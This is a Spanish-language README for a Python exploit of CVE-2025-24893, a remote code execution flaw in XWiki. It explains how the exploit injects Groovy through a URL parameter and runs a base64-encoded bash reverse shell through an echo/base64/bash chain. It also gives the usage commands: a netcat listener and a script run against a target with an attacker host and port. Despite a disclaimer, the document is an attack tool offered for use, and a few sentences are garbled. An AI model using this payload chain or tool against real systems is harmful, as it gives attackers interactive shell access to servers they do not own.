
CVE-2025-24893 exploit RCE para XWiki con capacidad de shell inversa
Descargo de responsabilidad: Este script está destinado solo con fines educativos y pruebas de seguridad autorizadas. No lo utilice en sistemas que no posea o para los que no tenga permiso explícito para realizar pruebas. El mal uso puede ser ilegal y peligroso.
Este script de Python explota CVE-2025-24893, una vulnerabilidad de ejecución remota de código que afecta a versiones de XWiki hasta 15.10.10.
Esta versión extiende el PoC original de Al Baradi Joy para generar un reverse shell. El PoC original se puede encontrar aquí.
XWiki ejecuta código Groovy a través del parámetro de URL.
El exploit inyecta un comando bash -c en esta plantilla Groovy.
Un reverse shell normal contiene múltiples comillas (' y ) que y la URL.
"Para solucionarlo, el script codifica el comando de shell de una línea en Base64.
Luego, el payload se envía en la URL y se ejecuta usando la siguiente cadena:
{echo,<base64>} | {base64,-d} | {bash,-i}
Esto decodifica el payload Base64 de forma segura y lo ejecuta con bash -i, otorgando un reverse shell interactivo.
http://<host-objetivo>/ al final/xwiki (el script la añade automáticamente)Ejemplos:
# Correcto
http://10.129.95.114:8080
http://ejemplo.com:8080
# Incorrecto
http://10.129.95.114:8080/ # barra diagonal al final
http://ejemplo.com/xwiki # incluye /xwiki
Antes de ejecutar el exploit, debe iniciar un listener en su máquina para capturar el reverse shell.
Ejemplo usando Netcat:
nc -lvnp <lport>
<lport> debe coincidir con el puerto que proporcione como argumento al script.python3 cve-2025-24893.py <url_base_objetivo> <lhost> <lport>
Ejemplo:
python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444